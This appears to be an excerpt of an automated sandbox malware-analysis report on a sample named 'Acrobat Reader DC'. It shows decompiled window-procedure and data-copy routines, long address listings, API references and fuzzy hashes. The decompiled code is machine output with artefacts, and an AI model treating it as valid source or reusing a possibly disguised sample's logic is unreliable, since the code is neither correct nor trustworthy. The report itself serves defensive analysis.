                                  								goto L49;
                                  							}
                                  							__imp__#9(_t534);
                                  							_push( *_t563);
                                  							E004111DC();
                                  							_t575 = _t575 + 4;
                                  							goto L53;
                                  						} else {
                                  							L49:
                                  							__eflags = _t448 - 0xa;
                                  							if(_t448 == 0xa) {
                                  								_t449 =  *_t563;
                                  								__eflags = _t449;
                                  								if(_t449 != 0) {
                                  									E0044318E(_t449);
                                  								}
                                  							} else {
                                  								__eflags = _t448 - 5;
                                  								if(_t448 == 5) {
                                  									E0040E270(_t563, _t563);
                                  								} else {
                                  									__eflags = _t448 - 0xb;
                                  									if(_t448 == 0xb) {
                                  										_push( *((intOrPtr*)( *_t563 + 4)));
                                  										E004111DC();
                                  										_push( *_t563);
                                  										E004111DC();
                                  										_t575 = _t575 + 8;
                                  									} else {
                                  										__eflags = _t448 - 0xc;
                                  										if(_t448 == 0xc) {
                                  											_t459 =  *_t563;
                                  											__eflags = _t459;
                                  											if(_t459 != 0) {
                                  												E0044B3D9(_t459);
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							L53:
                                  							 *(_t563 + 8) = 1;
                                  							 *_t563 = 0;
                                  							_t450 =  *0x4a95f8; // 0x1
                                  							 *(_t563 + 8) = _t450;
                                  							_t451 =  *0x4a95f8; // 0x1
                                  							__eflags = _t451 - 1;
                                  							if(_t451 != 1) {
                                  								_t452 = _t451 - 1;
                                  								__eflags = _t452 - 0xb;
                                  								if(__eflags > 0) {
                                  									goto L55;
                                  								}
                                  								switch( *((intOrPtr*)(_t452 * 4 +  &M0042BCAE))) {
                                  									case 0:
                                  										goto L54;
                                  									case 1:
                                  										 *_t563 =  *0x4a95f0;
                                  										_t553 =  *0x4a95f4; // 0x0
                                  										 *((intOrPtr*)(_t563 + 4)) = _t553;
                                  										goto L55;
                                  									case 2:
                                  										__fp0 =  *0x4a95f0;
                                  										 *__esi = __fp0;
                                  										goto L55;
                                  									case 3:
                                  										_push(0x10);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											 *(__esi + 0xc) = 0;
                                  										} else {
                                  											__ecx =  *0x4a95fc; // 0x0
                                  											__edx =  *__ecx;
                                  											 *__eax =  *__ecx;
                                  											__edx =  *(__ecx + 4);
                                  											 *(__eax + 4) =  *(__ecx + 4);
                                  											__edx =  *(__ecx + 8);
                                  											 *(__eax + 8) = __edx;
                                  											__ecx =  *(__ecx + 0xc);
                                  											 *(__eax + 0xc) = __ecx;
                                  											 *__ecx = 1 +  *__ecx;
                                  											 *(__esi + 0xc) = __eax;
                                  										}
                                  										goto L55;
                                  									case 4:
                                  										_push(0x214);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											__esi =  *0x4a95f0; // 0x0
                                  											__ebx = _v124;
                                  											__ecx = 0x85;
                                  											__edi = __eax;
                                  											__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  											__esi + __ecx = __esi + __ecx + __ecx;
                                  											__ecx = 0;
                                  											__esi = _v128;
                                  											__edi = _a8;
                                  										}
                                  										 *__esi = __eax;
                                  										__eflags =  *(__eax + 4);
                                  										if( *(__eax + 4) != 0) {
                                  											__eax =  *(__eax + 4);
                                  											 *__eax = 1 +  *__eax;
                                  										}
                                  										goto L55;
                                  									case 5:
                                  										__eax =  *0x4a95f0;
                                  										 *__esi = __eax;
                                  										goto L55;
                                  									case 6:
                                  										__ecx =  *0x4a95f0;
                                  										 *__esi = __ecx;
                                  										goto L55;
                                  									case 7:
                                  										__eflags =  *0x4a95f0;
                                  										if(__eflags != 0) {
                                  											_push(0x10);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__esp = __esp + 4;
                                  											_push(__eax);
                                  											 *__esi = __eax;
                                  											__imp__#8();
                                  											__edx =  *0x4a95f0; // 0x0
                                  											__eax =  *__esi;
                                  											_push(__edx);
                                  											_push(__eax);
                                  											__imp__#10();
                                  											__eflags = __eax;
                                  											if(__eax < 0) {
                                  												__ecx =  *__esi;
                                  												_push( *__esi);
                                  												__imp__#9();
                                  												__edx =  *__esi;
                                  												_push(__edx);
                                  												__eax = E004111DC();
                                  												__esp = __esp + 4;
                                  												 *__esi = 0;
                                  											}
                                  										}
                                  										goto L55;
                                  									case 8:
                                  										__al =  *0x4a95f0;
                                  										 *__esi = __al;
                                  										goto L55;
                                  									case 9:
                                  										_push(0x18);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											goto L209;
                                  										}
                                  										__ecx =  *0x4a95f0; // 0x0
                                  										__eax = E0044B8A3(__eax, __ecx);
                                  										 *__esi = __eax;
                                  										goto L55;
                                  									case 0xa:
                                  										_push(8);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										 *__esi = __eax;
                                  										__edx =  *0x4a95f0; // 0x0
                                  										__ecx =  *__edx;
                                  										 *__eax =  *__edx;
                                  										__edx =  *__esi;
                                  										__eax =  *( *__esi);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eflags == 0) {
                                  											_push(1);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *(__ecx + 4) = __eax;
                                  											__edx =  *__esi;
                                  											__eax =  *(__edx + 4);
                                  											__esp = __esp + 4;
                                  											 *__eax = 0;
                                  										} else {
                                  											_push(__eax);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *( *__esi + 4) = __eax;
                                  											__eax =  *__esi;
                                  											__edx =  *__eax;
                                  											__ecx =  *0x4a95f0; // 0x0
                                  											__eax =  *(__eax + 4);
                                  											__esp = __esp + 4;
                                  											__edx =  *(__ecx + 4);
                                  											__eax = E00410E60(__eax,  *(__ecx + 4),  *(__ecx + 4));
                                  										}
                                  										goto L55;
                                  									case 0xb:
                                  										_push(0x14);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											L209:
                                  											__eax = 0;
                                  											 *__esi = 0;
                                  											goto L55;
                                  										}
                                  										__ecx =  *0x4a95f0; // 0x0
                                  										__eax = E00470870(__eax, __ecx);
                                  										 *__esi = __eax;
                                  										goto L55;
                                  								}
                                  							}
                                  							L54:
                                  							_t554 =  *0x4a95f0; // 0x0
                                  							 *_t563 = _t554;
                                  							goto L55;
                                  						}
                                  					}
                                  					L9:
                                  					_t490 = 0x14;
                                  					goto L10;
                                  				}
                                  			}
                                  0x0042b91f
                                  0x0042b922
                                  0x0042b922
                                  0x0042b908
                                  0x00000000
                                  0x00000000
                                  0x0042b92d
                                  0x0042b932
                                  0x00000000
                                  0x00000000
                                  0x0042b939
                                  0x0042b93b
                                  0x0042b940
                                  0x0042b943
                                  0x0042b945
                                  0x00000000
                                  0x00000000
                                  0x0042b94b
                                  0x0042b953
                                  0x0042b958
                                  0x00000000
                                  0x00000000
                                  0x0042b968
                                  0x0042b96a
                                  0x0042b96f
                                  0x0042b971
                                  0x0042b977
                                  0x0042b979
                                  0x0042b97b
                                  0x0042b97d
                                  0x0042b97f
                                  0x0042b982
                                  0x0042b984
                                  0x0042b9b8
                                  0x0042b9ba
                                  0x0042b9bf
                                  0x0042b9c1
                                  0x0042b9c4
                                  0x0042b9c6
                                  0x0042b9c9
                                  0x0042b9cc
                                  0x0042b98a
                                  0x0042b98a
                                  0x0042b98b
                                  0x0042b990
                                  0x0042b992
                                  0x0042b995
                                  0x0042b997
                                  0x0042b999
                                  0x0042b99f
                                  0x0042b9a2
                                  0x0042b9a6
                                  0x0042b9ab
                                  0x0042b9b0
                                  0x00000000
                                  0x00000000
                                  0x0042b9d4
                                  0x0042b9d6
                                  0x0042b9db
                                  0x0042b9de
                                  0x0042b9e0
                                  0x0042b95f
                                  0x0042b95f
                                  0x0042b961
                                  0x00000000
                                  0x0042b961
                                  0x0042b9e6
                                  0x0042b9ee
                                  0x0042b9f3
                                  0x00000000
                                  0x00000000
                                  0x0042b806
                                  0x0040a928
                                  0x0040a928
                                  0x0040a92e
                                  0x00000000
                                  0x0040a92e
                                  0x0040a8da
                                  0x0040a829
                                  0x0040a9f5
                                  0x0040a9f8
                                  0x0040ab3a
                                  0x0040ab3d
                                  0x00000000
                                  0x00000000
                                  0x0040ab43
                                  0x0040ab4a
                                  0x00000000
                                  0x0040adf2
                                  0x0040adf4
                                  0x0040adf7
                                  0x0040ae02
                                  0x0040ae02
                                  0x0040ae05
                                  0x0042b285
                                  0x0042b288
                                  0x0042b28b
                                  0x00000000
                                  0x00000000
                                  0x0042b291
                                  0x0042b298
                                  0x00000000
                                  0x0042b29f
                                  0x0042b2a0
                                  0x0042b2a5
                                  0x00000000
                                  0x00000000
                                  0x0042b2ac
                                  0x0042b2ad
                                  0x0042b2b2
                                  0x00000000
                                  0x00000000
                                  0x0042b2de
                                  0x0042b2e3
                                  0x0042b2e7
                                  0x0042b2ef
                                  0x0042b2f4
                                  0x0042b2f9
                                  0x0042b2fd
                                  0x00000000
                                  0x00000000
                                  0x0042b2b9
                                  0x0042b2be
                                  0x0042b2c2
                                  0x0042b2ca
                                  0x0042b2cf
                                  0x0042b2d4
                                  0x0042b2d8
                                  0x0042b2fe
                                  0x0042b2fe
                                  0x0042b307
                                  0x0042b308
                                  0x0042b30d
                                  0x0042b310
                                  0x0042b312
                                  0x00000000
                                  0x00000000
                                  0x0042b31b
                                  0x0042b31e
                                  0x0042b323
                                  0x0042b325
                                  0x0042b332
                                  0x0042b339
                                  0x0042b33a
                                  0x0042b33f
                                  0x0042b344
                                  0x0042b348
                                  0x0042b34d
                                  0x0042b354
                                  0x0042b35f
                                  0x0042b362
                                  0x0042b364
                                  0x0042b36b
                                  0x0042b370
                                  0x0042b374
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b298
                                  0x0040ae0b
                                  0x0040ae0c
                                  0x0040ae0f
                                  0x00000000
                                  0x0040ae0f
                                  0x0040adf9
                                  0x0040adfc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ad9c
                                  0x0040ada1
                                  0x0040ada5
                                  0x0040adad
                                  0x0040adb2
                                  0x0040adb7
                                  0x0042b12b
                                  0x0042b130
                                  0x0042b142
                                  0x0042b136
                                  0x0042b136
                                  0x0042b13a
                                  0x0042b13a
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adc1
                                  0x0040adc4
                                  0x0040adc9
                                  0x0040adcc
                                  0x0040add1
                                  0x0040add3
                                  0x00000000
                                  0x0040add9
                                  0x0040add9
                                  0x0040ade0
                                  0x00000000
                                  0x00000000
                                  0x0040ade6
                                  0x0040adea
                                  0x00000000
                                  0x0040adea
                                  0x00000000
                                  0x0042b079
                                  0x0042b07e
                                  0x0042b082
                                  0x0042b08a
                                  0x0042b08f
                                  0x0042b092
                                  0x0042b095
                                  0x0042b097
                                  0x0042b09a
                                  0x0042b09d
                                  0x0042b0a0
                                  0x0042b0a2
                                  0x0042b0a4
                                  0x0042b0ad
                                  0x0042b0af
                                  0x0042b0b4
                                  0x0042b0b8
                                  0x0042b0bf
                                  0x0042b0c1
                                  0x0042b0c4
                                  0x0042b0c6
                                  0x00000000
                                  0x00000000
                                  0x0042b0cf
                                  0x0042b0d4
                                  0x0042b0d8
                                  0x0042b0e0
                                  0x0042b0e5
                                  0x0042b0e8
                                  0x0042b0eb
                                  0x0042b0ed
                                  0x0042b0f0
                                  0x0042b0f3
                                  0x0042b0f5
                                  0x0042b0f7
                                  0x0042b100
                                  0x0042b102
                                  0x0042b107
                                  0x0042b10b
                                  0x0042b10d
                                  0x0042b114
                                  0x0042b116
                                  0x00000000
                                  0x00000000
                                  0x0042b1d2
                                  0x0042b1d7
                                  0x0042b1db
                                  0x0042b1e0
                                  0x0042b1e3
                                  0x0042b1e5
                                  0x0042b1e8
                                  0x0042b1eb
                                  0x0042b1ed
                                  0x0042b1f0
                                  0x0042b1f3
                                  0x0042b1f5
                                  0x0042b1f7
                                  0x0042b1fa
                                  0x0042b1fd
                                  0x0042b200
                                  0x0042b204
                                  0x0042b207
                                  0x0042b20b
                                  0x0042b20e
                                  0x0042b212
                                  0x0042b214
                                  0x0042b218
                                  0x0042b21d
                                  0x0042b221
                                  0x0042b222
                                  0x0042b223
                                  0x0042b228
                                  0x0042b22a
                                  0x0042bb51
                                  0x0042bb53
                                  0x0042bb56
                                  0x0042bb65
                                  0x0042bb6a
                                  0x0042bb6a
                                  0x0042bb6e
                                  0x00000000
                                  0x0042bb6e
                                  0x0042b230
                                  0x0042b234
                                  0x0042b237
                                  0x00000000
                                  0x00000000
                                  0x0040ad09
                                  0x0040ad0e
                                  0x0040ad12
                                  0x0040ad1a
                                  0x0040ad1f
                                  0x0040ad24
                                  0x0040ae23
                                  0x0040ae28
                                  0x0042b11f
                                  0x0042b123
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2e
                                  0x0040ad32
                                  0x0040ad38
                                  0x0040ad3b
                                  0x0040ad40
                                  0x0040ad42
                                  0x0042bb47
                                  0x0042bb4b
                                  0x00000000
                                  0x0040ad48
                                  0x0040ad48
                                  0x0040ad4c
                                  0x00000000
                                  0x0040ad4c
                                  0x00000000
                                  0x0042b14b
                                  0x0042b150
                                  0x0042b154
                                  0x0042b159
                                  0x0042b160
                                  0x0042b165
                                  0x0042b16a
                                  0x0042b16e
                                  0x0042b172
                                  0x0042b177
                                  0x0042b179
                                  0x00000000
                                  0x00000000
                                  0x0042b17f
                                  0x0042b186
                                  0x00000000
                                  0x00000000
                                  0x0042b18c
                                  0x0042b190
                                  0x0042b193
                                  0x00000000
                                  0x00000000
                                  0x0042b37c
                                  0x0042b37e
                                  0x0042b3c6
                                  0x0042b3c6
                                  0x0042b3ca
                                  0x0042b3d1
                                  0x0042b3d6
                                  0x0042b3d8
                                  0x0042bb99
                                  0x0042bb9c
                                  0x0042bba1
                                  0x0042bbaf
                                  0x0042bbb4
                                  0x0042bbb8
                                  0x00000000
                                  0x0042bbb8
                                  0x0042b3de
                                  0x0042b3e0
                                  0x0042b3e3
                                  0x0042b3e7
                                  0x0042b3eb
                                  0x0042b3ed
                                  0x0042b3ef
                                  0x0042b3f7
                                  0x0042b3fc
                                  0x0042b3ff
                                  0x0042b403
                                  0x0042b404
                                  0x0042b405
                                  0x0042b406
                                  0x0042b408
                                  0x0042b40d
                                  0x0042b40f
                                  0x0042bbbe
                                  0x0042bbc1
                                  0x0042bbc6
                                  0x0042bbd1
                                  0x0042bbd6
                                  0x00000000
                                  0x0042bbd6
                                  0x0042b415
                                  0x0042b419
                                  0x0042b41d
                                  0x0042b425
                                  0x0042b42a
                                  0x0042b42c
                                  0x0042b431
                                  0x0042b435
                                  0x00000000
                                  0x0042b435
                                  0x0042b387
                                  0x0042b38b
                                  0x0042b38f
                                  0x0042b39f
                                  0x0042b39f
                                  0x0042b3b2
                                  0x0042b3b7
                                  0x0042b3b9
                                  0x0042bb74
                                  0x0042bb77
                                  0x0042bb7c
                                  0x0042bb8a
                                  0x0042bb8f
                                  0x0042bb93
                                  0x00000000
                                  0x0042bb93
                                  0x0042b3bf
                                  0x00000000
                                  0x0042b3bf
                                  0x0042b395
                                  0x0042b399
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae16
                                  0x0040ae17
                                  0x0040ae1c
                                  0x00000000
                                  0x00000000
                                  0x0040aec0
                                  0x0040aec1
                                  0x0040aec6
                                  0x00000000
                                  0x00000000
                                  0x0040aeb6
                                  0x0040aeb8
                                  0x0040aeb9
                                  0x00000000
                                  0x00000000
                                  0x0042b244
                                  0x0042b245
                                  0x0042b24a
                                  0x00000000
                                  0x00000000
                                  0x0042b26b
                                  0x0042b26c
                                  0x0042b271
                                  0x00000000
                                  0x00000000
                                  0x0042b25e
                                  0x0042b25f
                                  0x0042b264
                                  0x00000000
                                  0x00000000
                                  0x0040accc
                                  0x0040accd
                                  0x0040acd2
                                  0x00000000
                                  0x00000000
                                  0x0040acd9
                                  0x0040acda
                                  0x0040acdf
                                  0x00000000
                                  0x00000000
                                  0x0040abfe
                                  0x0040ac02
                                  0x0040ac05
                                  0x0040ad8e
                                  0x0040ad91
                                  0x00000000
                                  0x00000000
                                  0x0042b1a0
                                  0x0040ac10
                                  0x0040ac10
                                  0x0040ac11
                                  0x00000000
                                  0x0040ac11
                                  0x0040ac0b
                                  0x0040ac0b
                                  0x00000000
                                  0x00000000
                                  0x0042b1aa
                                  0x0042b1ae
                                  0x0042b1b1
                                  0x0042b1c5
                                  0x0042b1c5
                                  0x0042b1ca
                                  0x0042b1ca
                                  0x0042b1cb
                                  0x00000000
                                  0x0042b1cb
                                  0x0042b1b7
                                  0x0042b1bc
                                  0x0042b1bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ac3d
                                  0x0040ac3e
                                  0x0040ac43
                                  0x00000000
                                  0x00000000
                                  0x0040ab52
                                  0x0040ab57
                                  0x00000000
                                  0x00000000
                                  0x0040ace6
                                  0x0040ace7
                                  0x0040acec
                                  0x00000000
                                  0x00000000
                                  0x0042b251
                                  0x0042b252
                                  0x0042b257
                                  0x00000000
                                  0x00000000
                                  0x0042b278
                                  0x0042b279
                                  0x0042b27e
                                  0x0040a83d
                                  0x0040a83d
                                  0x0040a841
                                  0x0040a845
                                  0x0040a845
                                  0x0040a849
                                  0x0040a84f
                                  0x0040ab5e
                                  0x0040a855
                                  0x0040a855
                                  0x0040a855
                                  0x0040a85c
                                  0x0040a867
                                  0x0040aaec
                                  0x0040aaef
                                  0x0040ab1f
                                  0x0040ab1f
                                  0x0040ab22
                                  0x0040ae37
                                  0x0040ae37
                                  0x0040ae3c
                                  0x0040ab31
                                  0x0040ab31
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a805
                                  0x00000000
                                  0x0040a800
                                  0x0040ae4f
                                  0x0040ae56
                                  0x0040ae5b
                                  0x0040ae5d
                                  0x0042bae5
                                  0x0042bae5
                                  0x0042baea
                                  0x0040ae7a
                                  0x0040ae7e
                                  0x0040ae83
                                  0x00000000
                                  0x0040ae83
                                  0x0042baf0
                                  0x0042baf5
                                  0x0042bafa
                                  0x0042baff
                                  0x0042bb01
                                  0x0042bc43
                                  0x0042bc48
                                  0x0042bc4c
                                  0x0042bc4c
                                  0x0042bc51
                                  0x0042bc55
                                  0x0042bc56
                                  0x0042bc56
                                  0x0042bc5f
                                  0x0042bc64
                                  0x0040a8a4
                                  0x0040a8aa
                                  0x0040a8aa
                                  0x0042bb07
                                  0x0042bb0b
                                  0x0042bb0f
                                  0x0042bb24
                                  0x0042bb2d
                                  0x0042bb15
                                  0x0042bb15
                                  0x0042bb1e
                                  0x0042bb1e
                                  0x0042bb33
                                  0x0042bb34
                                  0x0042bb3d
                                  0x00000000
                                  0x0042bb3d
                                  0x0040ae63
                                  0x0040ae68
                                  0x0040ae6c
                                  0x00000000
                                  0x00000000
                                  0x0040ae72
                                  0x0040ae74
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae74
                                  0x0040ab28
                                  0x0040ab2b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ab2b
                                  0x0040aaf1
                                  0x00000000
                                  0x0040aaf8
                                  0x0040aafa
                                  0x0040abd6
                                  0x0040abd8
                                  0x0040ab00
                                  0x0040ab00
                                  0x0040ab02
                                  0x0040ab07
                                  0x0040ab0a
                                  0x0040ab0c
                                  0x0042bade

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc
                                  • String ID: Default
                                  • API String ID: 1579825452-753088835
                                  • Opcode ID: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                  • Opcode Fuzzy Hash: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1264 401100-401111 1265 401113-401119 1264->1265 1266 401179-401180 1264->1266 1268 401144-40114a 1265->1268 1269 40111b-40111e 1265->1269 1266->1265 1267 401182 1266->1267 1270 40112c-401141 DefWindowProcW 1267->1270 1272 401184-40118e call 401250 1268->1272 1273 40114c-40114f 1268->1273 1269->1268 1271 401120-401126 1269->1271 1271->1270 1277 42b038-42b03f 1271->1277 1281 401193-40119a 1272->1281 1274 401151-401157 1273->1274 1275 40119d 1273->1275 1278 401219-40121f 1274->1278 1279 40115d 1274->1279 1282 4011a3-4011a9 1275->1282 1283 42afb4-42afc5 call 40f190 1275->1283 1277->1270 1280 42b045-42b059 call 401000 call 40e0c0 1277->1280 1278->1271 1286 401225-42b06d call 468b0e 1278->1286 1284 401163-401166 1279->1284 1285 42b01d-42b024 1279->1285 1280->1270 1282->1271 1289 4011af 1282->1289 1283->1281 1291 42afe9-42b018 call 40f190 call 401a50 1284->1291 1292 40116c-401172 1284->1292 1285->1270 1290 42b02a-42b033 call 4370f4 1285->1290 1286->1281 1289->1271 1296 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1289->1296 1297 4011db-401202 SetTimer RegisterWindowMessageW 1289->1297 1290->1270 1291->1270 1292->1271 1300 401174-42afde call 45fd57 1292->1300 1297->1281 1298 401204-401216 CreatePopupMenu 1297->1298 1300->1270 1315 42afe4 1300->1315 1315->1281
                                  C-Code - Quality: 96%
                                  			E00401100(int __edi, struct HWND__* _a4, int _a8, signed int _a12) {
                                  				struct HWND__* __ebx;
                                  				void* __esi;
                                  				signed int _t20;
                                  				long _t22;
                                  				void* _t36;
                                  				struct HWND__* _t38;
                                  				void* _t43;
                                  				void* _t49;
                                  				int _t52;
                                  				void* _t67;
                                  
                                  				_t52 = __edi;
                                  				_t38 = _a4;
                                  				if(_t38 !=  *0x497518) {
                                  					__eflags =  *0x497518;
                                  					if( *0x497518 == 0) {
                                  						goto L1;
                                  					} else {
                                  						goto L4;
                                  					}
                                  				} else {
                                  					L1:
                                  					if(_t52 >= 0x111 || _t52 < 0x12) {
                                  						__eflags = _t52 - 0x113;
                                  						if(_t52 == 0x113) {
                                  							E00401250(_a8, _t43, _t38, 0x4a8710);
                                  							goto L15;
                                  						} else {
                                  							__eflags = _t52 - 0x10;
                                  							if(__eflags <= 0) {
                                  								if(__eflags == 0) {
                                  									 *0x4974e6 = 1;
                                  									E0040F190(_t43, 0x4a8178);
                                  									goto L15;
                                  								} else {
                                  									_t20 = _t52 - 1;
                                  									__eflags = _t20 - 6;
                                  									if(_t20 > 6) {
                                  										goto L3;
                                  									} else {
                                  										switch( *((intOrPtr*)(_t20 * 4 +  &M0040122C))) {
                                  											case 0:
                                  												__eax = SetTimer(__ebx, 1, 0x2ee, 0); // executed
                                  												__eax = RegisterWindowMessageW(L"TaskbarCreated");
                                  												__eflags =  *0x4a8710;
                                  												 *0x4a95e8 = __eax;
                                  												if( *0x4a8710 != 0) {
                                  													goto L15;
                                  												} else {
                                  													__eax = CreatePopupMenu();
                                  													_pop(__esi);
                                  													 *0x4a8710 = __eax;
                                  													__eax = 0;
                                  													__eflags = 0;
                                  													_pop(__ebx);
                                  													return 0;
                                  												}
                                  												goto L35;
                                  											case 1:
                                  												KillTimer(_t38, 1);
                                  												E00401000(0x4a8710);
                                  												PostQuitMessage(0);
                                  												__eflags = 0;
                                  												return 0;
                                  												goto L35;
                                  											case 2:
                                  												goto L3;
                                  											case 3:
                                  												__eax = _a12;
                                  												__ecx = _a12;
                                  												__edx = __ax & 0x0000ffff;
                                  												__eax =  *0x497514;
                                  												__ecx = _a12 >> 0x10;
                                  												__eax = MoveWindow( *0x497514, 0, 0, __ax & 0x0000ffff, _a12 >> 0x10, 1);
                                  												goto L15;
                                  											case 4:
                                  												 *0x497514 = SetFocus( *0x497514);
                                  												goto L15;
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								__eflags = _t52 - 0x312;
                                  								if(__eflags > 0) {
                                  									__eflags = _t52 - 0x401;
                                  									if(_t52 != 0x401) {
                                  										goto L3;
                                  									} else {
                                  										E00468B0E(_t67, 0x4a8710, _t38, _a12);
                                  										goto L15;
                                  									}
                                  								} else {
                                  									if(__eflags == 0) {
                                  										__eflags =  *0x4974ec;
                                  										if(__eflags == 0) {
                                  											E004370F4( &_a8, __eflags,  &_a8);
                                  										}
                                  										goto L4;
                                  									} else {
                                  										__eflags = _t52 - 0x11;
                                  										if(_t52 == 0x11) {
                                  											asm("sbb eax, eax");
                                  											 *0x4974f0 =  ~(_a12 & 0x80000000) + 4;
                                  											 *0x4974e6 = 0;
                                  											E0040F190(_t43, 0x4a8178);
                                  											E00401A50(0x4a8178, _t49, __eflags, _t67);
                                  											_t38 = _a4;
                                  											goto L4;
                                  										} else {
                                  											__eflags = _t52 - 0x111;
                                  											if(__eflags != 0) {
                                  												goto L3;
                                  											} else {
                                  												_t36 = E0045FD57(__eflags, _t67, 0x4a8710, _a8, _a12);
                                  												__eflags = _t36 - 1;
                                  												if(_t36 != 1) {
                                  													goto L4;
                                  												} else {
                                  													L15:
                                  													__eflags = 0;
                                  													return 0;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						L3:
                                  						if(_t52 ==  *0x4a95e8) {
                                  							__eflags =  *0x4974ea - 1;
                                  							if( *0x4974ea == 1) {
                                  								E00401000(0x4a8710);
                                  								E0040E0C0(0x4a8710, _t67);
                                  							}
                                  						}
                                  						L4:
                                  						_t22 = DefWindowProcW(_t38, _t52, _a8, _a12); // executed
                                  						return _t22;
                                  					}
                                  				}
                                  				L35:
                                  			}














                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                  • SetTimer.USER32 ref: 004011E5
                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                  • CreatePopupMenu.USER32(?,?,?,004010F8,?,?,?), ref: 00401204
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 129472671-2362178303
                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
